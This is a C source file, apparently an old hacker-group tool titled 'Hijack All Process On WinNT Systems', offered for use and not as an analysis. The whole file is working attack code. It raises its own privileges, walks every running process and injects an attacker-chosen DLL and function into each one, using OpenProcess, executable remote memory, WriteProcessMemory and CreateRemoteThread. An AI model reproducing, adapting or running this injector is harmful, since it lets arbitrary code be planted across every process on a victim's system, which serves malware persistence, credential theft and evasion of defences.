/*
        ______            _  _   __            _ 
        | ___ \          | || | / /           | |
        | |_/ /  ___   __| || |/ /   ___    __| |
        |    /  / _ \ / _` ||    \  / _ \  / _` |
        | |\ \ |  __/| (_| || |\  \| (_) || (_| |
        \_| \_| \___| \__,_|\_| \_/ \___/  \__,_|
                                          
            Hijack All Process On WinNT Systems
		      Version 0.1

                                      RedKod Team
                                    www.redkod.com
Coder: R-e-D
Mail : r-e-d@redkod.com

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#include "patch0r.h"

int LoadPrivilege(void)
{
	HANDLE tok;
	LUID luid;
	TOKEN_PRIVILEGES tp;

	if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&tok)) 
	{
			LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid);
			tp.PrivilegeCount=1;
			tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
			tp.Privileges[0].Luid=luid;
			AdjustTokenPrivileges(tok,FALSE,&tp,0,0,0);		
			LookupPrivilegeValue(NULL,SE_SECURITY_NAME,&luid);
			tp.PrivilegeCount=1;
			tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
			tp.Privileges[0].Luid=luid;
			AdjustTokenPrivileges(tok,FALSE,&tp,0,0,0);
			CloseHandle(tok);
	}
	 
	return(0);
}

DWORD __stdcall RemoteThread(RemoteThreadData *data)
{
	typedef DWORD (*RemoteFunction)(void);
	HMODULE hModule = NULL;

	/* Load the library */
	data->hModule = (HMODULE)(*data->fnLoadLibrary)(data->imported_lib);
	hModule = data->hModule;
	
	if (hModule == NULL)
		hModule = (*data->fnGetModuleHandle)(data->imported_lib);

	/* Function */
	if (data->imported_function != 0 )
	{
		/* Execute the function */
		RemoteFunction fnRemoteFunction = (RemoteFunction)
			(*data->fnGetProcAddress)(hModule, data->imported_function);

		if (fnRemoteFunction != NULL)
			(*fnRemoteFunction)();	
	}

	/* Free the loaded library */
	data->fnFreeLibrary(hModule);

	return(0);
}

int Hijack(DWORD pid, char *hLib, char *hFonction)
{
	HINSTANCE hDll;
	HANDLE hProc, hThread=NULL;
	DWORD thread_pid, rc;
	BOOL result = 0;
	RemoteThreadData param;
	RemoteThreadData *DataPointer = 0;
	void *CodePointer = NULL;

	/* Clean the structure */
	ZeroMemory(&param, sizeof(RemoteThreadData));

	/* Load the kernel32.dll for getting all imported function address */
	hDll = LoadLibrary("kernel32.dll");
	if(hDll == NULL)
	{
		fprintf(stderr, "Error: LoadLibrary(""kernel32.dll"") : %d\n", GetLastError());
		return(-1);
	}
	
    /* Set parameters of the RemoteThreadData structure */
	param.fnLoadLibrary     = (ptLoadLibraryA)GetProcAddress(hDll, "LoadLibraryA");
	param.fnFreeLibrary     = (ptFreeLibrary)GetProcAddress(hDll, "FreeLibrary");
	param.fnGetProcAddress  = (ptGetProcAddress)GetProcAddress(hDll, "GetProcAddress");
        param.fnGetModuleHandle = (ptGetModuleHandleW)GetProcAddress(hDll, "GetModuleHandleW");

	if(param.fnLoadLibrary == NULL || param.fnFreeLibrary == NULL || param.fnGetProcAddress == NULL || param.fnGetModuleHandle == NULL)
	{
		fprintf(stderr, "GetProcAddress(???) : %d\n", GetLastError());
		goto clean;
	}

	strncpy(param.imported_lib, hLib, 256);
	strncpy(param.imported_function, hFonction, 256);
	strncpy((char *)param.options, "f34r d4 RedKod", 256);

	/* Open the remote process */
	hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
	if(hProc == NULL) {
		fprintf(stderr, "Error: OpenProcess() : %d (SYSTEM Process PID : [%d])\n", GetLastError(), pid);
		goto clean;
	}

	/* Allocate memory for the code */
	CodePointer = VirtualAllocEx(hProc, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if(CodePointer == NULL) {
		fprintf(stderr, "Error: VirtualAllocEx() : %d\n", GetLastError());
		goto clean;
	}	

	/* Allocate memory for all parameter */
	DataPointer = (RemoteThreadData *)VirtualAllocEx(hProc, 0, sizeof(RemoteThreadData), MEM_COMMIT, PAGE_READWRITE);
	if (DataPointer == 0) {
		fprintf(stderr, "Error: VirtualAllocEx() : %d\n", GetLastError());
		goto clean;
	} 
		
	/* copy function there, we will execute this piece of code */
	result = WriteProcessMemory(hProc, CodePointer, &RemoteThread, MAXINJECTSIZE, 0);
	if (result == 0) {
		fprintf(stderr, "Error: WriteProcessMemory() : %d\n", GetLastError());
		goto clean;
	}

	/* copy data in the remote process */
	result = WriteProcessMemory(hProc, DataPointer, &param, sizeof(RemoteThreadData), 0);
	if (result == 0) {
		fprintf(stderr, "Error: WriteProcessMemory() : %d\n", GetLastError());
		goto clean;
	} 

	/* Create the remote thread */
	hThread = CreateRemoteThread(hProc,  NULL,  0, (DWORD (__stdcall *)( void *)) CodePointer, DataPointer, 0, &thread_pid);
	if (hThread == NULL) {
		fprintf(stdout, "Error: CreateRemoteThread() : %d\n", GetLastError());
		goto clean;
	} 

	/* wait for single object */
	rc = WaitForSingleObject(hThread, INFINITE); 

	switch (rc) 
	{
	case WAIT_TIMEOUT:
		fprintf(stderr, "Error: WAIT_TIMEOUT : %d\n", GetLastError());
		goto clean;
	case WAIT_FAILED:
		fprintf(stderr, "Error: WAIT_FAILED : %d\n", GetLastError());
		goto clean;
	case WAIT_OBJECT_0:
		if (!ReadProcessMemory(hProc, CodePointer, &param, sizeof(RemoteThreadData), 0 ))
		{
			fprintf(stderr, "Error: ReadProcessMemory() : %d\n", GetLastError());
			goto clean;
		}

		break;
	default:
		printf("HuHu?\n");
		break;
	}

	fprintf(stdout, "Ok! Process [%d] has been successfully injected.\n", pid);

	/* w0000 */

clean:
	CloseHandle(hThread);

	if (CodePointer != 0)
		VirtualFreeEx(hProc, CodePointer, 0, MEM_RELEASE);
	if (DataPointer != 0)
		VirtualFreeEx(hProc, DataPointer, 0, MEM_RELEASE);
	if ( hDll != NULL)
		FreeLibrary(hDll);

	return(0);
}


int main(int argc, char *argv[])
{
	HINSTANCE hDll;
	NtQuerySystemInformation pNtQuerySystemInformation;
	NTSTATUS ret;
	struct process_info *p;
	unsigned int  len = 0;
	unsigned long RetLen = 0;
	int flag = 0;
	void *buffer = NULL;

	if(argc < 3)
	{
		fprintf(stderr, "Usage : %s <imported dll> <imported function>\n", argv[0]);
		return(-1);
	}

	/* Load Se Privilege */
	LoadPrivilege();

	/* Load NTDLL.DLL */
	hDll = LoadLibrary("NTDLL.DLL");
	if(hDll == NULL)
	{
		fprintf(stderr, "Error : LoadLibrary()\n");
		return(GetLastError());
	}

	/* Get address of "NtQuerySystemInformation" Function */
	pNtQuerySystemInformation = (NtQuerySystemInformation)GetProcAddress(hDll, "NtQuerySystemInformation");
	if(pNtQuerySystemInformation == NULL)
	{
		fprintf(stderr, "Error: GetProcAddress\n");
		FreeLibrary(hDll);
		return(GetLastError());
	}
	
	/* Get Information with the NtQuerySystemInformation function */
	do
	{
		len += 0x1000;
		buffer = realloc(buffer, len);

		if (!buffer)
		{
			FreeLibrary(hDll);
		    return(GetLastError());
		}

		ret = pNtQuerySystemInformation(SystemProcessInformation, (unsigned char *)buffer, len, &RetLen);

	} while (ret == STATUS_INFO_LEN_MISMATCH);

	if (ret < 0) 
	{
		free (buffer);	
		FreeLibrary(hDll);
		return(GetLastError());
	}

	/* Display All informations */
	p = (struct process_info *)buffer;

	while (!flag)
	{
		fprintf(stdout, "-> Hijack Process [%d].\n", p->ProcessId);
		Hijack(p->ProcessId, argv[1], argv[2]);
		flag = p->NextEntryDelta == 0;
		p = (struct process_info *)(((char *)p) + p->NextEntryDelta);
	}	

	/* Clean */
	free(buffer);
	FreeLibrary(hDll);

	return(0);
}
